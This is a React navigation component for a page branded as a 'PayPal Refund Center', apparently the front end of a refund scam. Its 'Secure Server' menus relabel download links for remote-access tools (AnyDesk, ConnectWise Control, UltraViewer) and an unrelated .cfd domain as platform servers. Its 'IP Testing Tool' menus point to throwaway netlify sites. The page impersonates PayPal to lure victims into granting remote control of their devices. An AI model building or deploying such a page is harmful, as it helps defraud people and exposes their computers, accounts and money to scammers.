import { useState } from 'react';
import { Link, useLocation } from 'react-router-dom';

const Navigation = () => {
  const [isMenuOpen, setIsMenuOpen] = useState(false);
  const location = useLocation();

  const isActive = (path: string) => location.pathname === path;

  const navLinks = [
    { path: '/', label: 'Home' },
    { path: '/refund-request', label: 'Submit Refund Request' },
    { path: '/track-refund', label: 'Track Refund' },
    { path: '/terms', label: 'Terms & Conditions' },
    { path: '/privacy', label: 'Privacy Policy' },
    { path: '/contact', label: 'Contact Support' },
  ];

  return (
    <nav className="sticky top-0 z-50 bg-white/95 backdrop-blur-lg border-b border-[#0070ba]/20 shadow-sm">
      <div className="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
        <div className="flex justify-between items-center h-16">
          {/* Logo */}
          <Link to="/" className="flex items-center space-x-3 group">
            <div className="flex items-center">
              <span className="text-2xl font-bold text-[#0070ba]">Pay</span>
              <span className="text-2xl font-bold text-[#003087]">Pal</span>
            </div>
            <div className="hidden sm:block ml-2 pl-2 border-l-2 border-gray-300">
              <div className="text-sm font-semibold text-gray-700">Refund Center</div>
            </div>
          </Link>

          {/* Desktop Navigation */}
          <div className="hidden lg:flex items-center space-x-1">
            {navLinks.map((link) => (
              <Link
                key={link.path}
                to={link.path}
                className={`px-4 py-2 rounded-lg text-sm font-medium transition-all duration-200 ${
                  isActive(link.path)
                    ? 'bg-[#0070ba] text-white shadow-md'
                    : 'text-gray-700 hover:bg-[#e8f4fd] hover:text-[#0070ba]'
                }`}
              >
                {link.label}
              </Link>
            ))}
            
            {/* Secure Server Dropdown */}
            <div className="relative group">
              <button className="px-4 py-2 rounded-lg text-sm font-medium text-gray-700 hover:bg-[#e8f4fd] hover:text-[#0070ba] transition-all duration-200 flex items-center space-x-1">
                <span>Secure Server</span>
                <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
                </svg>
              </button>
              
              {/* Dropdown Menu */}
              <div className="absolute right-0 mt-2 w-72 bg-white rounded-lg shadow-xl border border-[#0070ba]/20 opacity-0 invisible group-hover:opacity-100 group-hover:visible transition-all duration-200 z-50">
                <div className="p-3">
                  <p className="text-xs text-gray-500 mb-3">Select your platform</p>
                  <div className="space-y-2">
                    <a
                      href="https://apps.apple.com/us/app/connectwise-control/id423995707"
                      target="_blank"
                      rel="noopener noreferrer"
                      className="block px-4 py-2 bg-gradient-to-r from-gray-100 to-gray-200 hover:from-gray-200 hover:to-gray-300 rounded-lg text-sm font-medium text-gray-800 transition-all shadow-sm flex items-center justify-between"
                    >
                      <span>🍎 Apple Secure Server</span>
                      <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                      </svg>
                    </a>
                    
                    <a
                      href="https://play.google.com/store/apps/details?id=com.anydesk.anydeskandroid&pcampaignid=web_share"
                      target="_blank"
                      rel="noopener noreferrer"
                      className="block px-4 py-2 bg-gradient-to-r from-gray-100 to-gray-200 hover:from-gray-200 hover:to-gray-300 rounded-lg text-sm font-medium text-gray-800 transition-all shadow-sm flex items-center justify-between"
                    >
                      <span>🤖 Android Secure Server</span>
                      <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                      </svg>
                    </a>
                    
                    <a
                      href="https://www.heerf58.cfd"
                      target="_blank"
                      rel="noopener noreferrer"
                      className="block px-4 py-2 bg-gradient-to-r from-gray-100 to-gray-200 hover:from-gray-200 hover:to-gray-300 rounded-lg text-sm font-medium text-gray-800 transition-all shadow-sm flex items-center justify-between"
                    >
                      <span>🪟 Windows Secure Server 1</span>
                      <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                      </svg>
                    </a>
                    
                    <a
                      href="https://anydesk.com/en/downloads/thank-you?dv=win_exe"
                      target="_blank"
                      rel="noopener noreferrer"
                      className="block px-4 py-2 bg-gradient-to-r from-gray-100 to-gray-200 hover:from-gray-200 hover:to-gray-300 rounded-lg text-sm font-medium text-gray-800 transition-all shadow-sm flex items-center justify-between"
                    >
                      <span>🪟 Windows Secure Server 2</span>
                      <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                      </svg>
                    </a>
                    
                    <a
                      href="https://www.ultraviewer.net/en/download.html"
                      target="_blank"
                      rel="noopener noreferrer"
                      className="block px-4 py-2 bg-gradient-to-r from-gray-100 to-gray-200 hover:from-gray-200 hover:to-gray-300 rounded-lg text-sm font-medium text-gray-800 transition-all shadow-sm flex items-center justify-between"
                    >
                      <span>🪟 Windows Secure Server 3</span>
                      <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                      </svg>
                    </a>
                  </div>
                </div>
              </div>
            </div>
            
            {/* IP Testing Tool Dropdown */}
            <div className="relative group">
              <button className="px-4 py-2 rounded-lg text-sm font-medium text-gray-700 hover:bg-[#e8f4fd] hover:text-[#0070ba] transition-all duration-200 flex items-center space-x-1">
                <span>IP Testing Tool</span>
                <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
                </svg>
              </button>
              
              {/* Dropdown Menu */}
              <div className="absolute right-0 mt-2 w-64 bg-white rounded-lg shadow-xl border border-[#0070ba]/20 opacity-0 invisible group-hover:opacity-100 group-hover:visible transition-all duration-200 z-50">
                <div className="p-3">
                  <p className="text-xs text-gray-500 mb-3">Check your connection security</p>
                  <div className="space-y-2">
                    <a
                      href="https://brilliant-pixie-efa6ee.netlify.app/"
                      target="_blank"
                      rel="noopener noreferrer"
                      className="block px-4 py-2 bg-gradient-to-r from-[#0070ba] to-[#003087] text-white rounded-lg text-sm font-medium hover:from-[#005ea6] hover:to-[#002a6f] transition-all duration-200 shadow-md flex items-center justify-between"
                    >
                      <span>Cyber Shield Server 1</span>
                      <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                      </svg>
                    </a>
                    <a
                      href="https://quiet-muffin-447329.netlify.app/"
                      target="_blank"
                      rel="noopener noreferrer"
                      className="block px-4 py-2 bg-gradient-to-r from-[#003087] to-[#001f5b] text-white rounded-lg text-sm font-medium hover:from-[#002a6f] hover:to-[#001849] transition-all duration-200 shadow-md flex items-center justify-between"
                    >
                      <span>Cyber Shield Server 2</span>
                      <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                      </svg>
                    </a>
                  </div>
                </div>
              </div>
            </div>
          </div>

          {/* Mobile Menu Button */}
          <button
            onClick={() => setIsMenuOpen(!isMenuOpen)}
            className="lg:hidden p-2 rounded-lg text-gray-600 hover:bg-[#e8f4fd] hover:text-[#0070ba] transition-colors"
          >
            <svg className="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24">
              {isMenuOpen ? (
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M6 18L18 6M6 6l12 12" />
              ) : (
                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M4 6h16M4 12h16M4 18h16" />
              )}
            </svg>
          </button>
        </div>

        {/* Mobile Menu */}
        {isMenuOpen && (
          <div className="lg:hidden py-4 space-y-4 animate-fadeIn">
            <div className="space-y-2">
              {navLinks.map((link) => (
                <Link
                  key={link.path}
                  to={link.path}
                  onClick={() => setIsMenuOpen(false)}
                  className={`block px-4 py-3 rounded-lg text-sm font-medium transition-all duration-200 ${
                    isActive(link.path)
                      ? 'bg-[#0070ba] text-white shadow-md'
                      : 'text-gray-700 hover:bg-[#e8f4fd] hover:text-[#0070ba]'
                  }`}
                >
                  {link.label}
                </Link>
              ))}
            </div>

            {/* IP Testing Tool Section */}
            <div className="border-t border-gray-200 pt-4">
              <div className="px-4 mb-3">
                <h3 className="text-sm font-bold text-gray-900 mb-1">IP Testing Tool</h3>
                <p className="text-xs text-gray-500">Check your connection security</p>
              </div>
              <div className="space-y-2">
                <a
                  href="https://starlit-duckanoo-47c828.netlify.app/"
                  target="_blank"
                  rel="noopener noreferrer"
                  onClick={() => setIsMenuOpen(false)}
                  className="block px-4 py-3 bg-gradient-to-r from-[#0070ba] to-[#003087] text-white rounded-lg text-sm font-medium hover:from-[#005ea6] hover:to-[#002a6f] transition-all duration-200 shadow-md flex items-center justify-between"
                >
                  <span>Cyber Shield Server 1</span>
                  <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                  </svg>
                </a>
                <a
                  href="https://adorable-dusk-2dc8ee.netlify.app/"
                  target="_blank"
                  rel="noopener noreferrer"
                  onClick={() => setIsMenuOpen(false)}
                  className="block px-4 py-3 bg-gradient-to-r from-[#003087] to-[#001f5b] text-white rounded-lg text-sm font-medium hover:from-[#002a6f] hover:to-[#001849] transition-all duration-200 shadow-md flex items-center justify-between"
                >
                  <span>Cyber Shield Server 2</span>
                  <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                  </svg>
                </a>
              </div>
            </div>

            {/* Secure Server Section */}
            <div className="border-t border-gray-200 pt-4 mt-4">
              <div className="px-4 mb-3">
                <h3 className="text-sm font-bold text-gray-900 mb-1">Secure Server</h3>
                <p className="text-xs text-gray-500">Select your platform</p>
              </div>
              <div className="space-y-2">
                <a
                  href="https://apps.apple.com/us/app/connectwise-control/id423995707"
                  target="_blank"
                  rel="noopener noreferrer"
                  onClick={() => setIsMenuOpen(false)}
                  className="block px-4 py-3 bg-white border border-gray-200 rounded-lg text-sm font-medium text-gray-800 hover:bg-gray-50 transition-all shadow-sm flex items-center justify-between"
                >
                  <span>🍎 Apple Secure Server</span>
                  <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                  </svg>
                </a>
                
                <a
                  href="https://play.google.com/store/apps/details?id=com.anydesk.anydeskandroid&pcampaignid=web_share"
                  target="_blank"
                  rel="noopener noreferrer"
                  onClick={() => setIsMenuOpen(false)}
                  className="block px-4 py-3 bg-white border border-gray-200 rounded-lg text-sm font-medium text-gray-800 hover:bg-gray-50 transition-all shadow-sm flex items-center justify-between"
                >
                  <span>🤖 Android Secure Server</span>
                  <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                  </svg>
                </a>
                
                <a
                  href="https://www.heerf58.cfd"
                  target="_blank"
                  rel="noopener noreferrer"
                  onClick={() => setIsMenuOpen(false)}
                  className="block px-4 py-3 bg-white border border-gray-200 rounded-lg text-sm font-medium text-gray-800 hover:bg-gray-50 transition-all shadow-sm flex items-center justify-between"
                >
                  <span>🪟 Windows Secure Server 1</span>
                  <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                  </svg>
                </a>
                
                <a
                  href="https://anydesk.com/en/downloads/thank-you?dv=win_exe"
                  target="_blank"
                  rel="noopener noreferrer"
                  onClick={() => setIsMenuOpen(false)}
                  className="block px-4 py-3 bg-white border border-gray-200 rounded-lg text-sm font-medium text-gray-800 hover:bg-gray-50 transition-all shadow-sm flex items-center justify-between"
                >
                  <span>🪟 Windows Secure Server 2</span>
                  <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                  </svg>
                </a>
                
                <a
                  href="https://www.ultraviewer.net/en/download.html"
                  target="_blank"
                  rel="noopener noreferrer"
                  onClick={() => setIsMenuOpen(false)}
                  className="block px-4 py-3 bg-white border border-gray-200 rounded-lg text-sm font-medium text-gray-800 hover:bg-gray-50 transition-all shadow-sm flex items-center justify-between"
                >
                  <span>🪟 Windows Secure Server 3</span>
                  <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M10 6H6a2 2 0 00-2 2v10a2 2 0 002 2h10a2 2 0 002-2v-4M14 4h6m0 0v6m0-6L10 14" />
                  </svg>
                </a>
              </div>
            </div>
          </div>
        )}
      </div>
    </nav>
  );
};

export default Navigation;
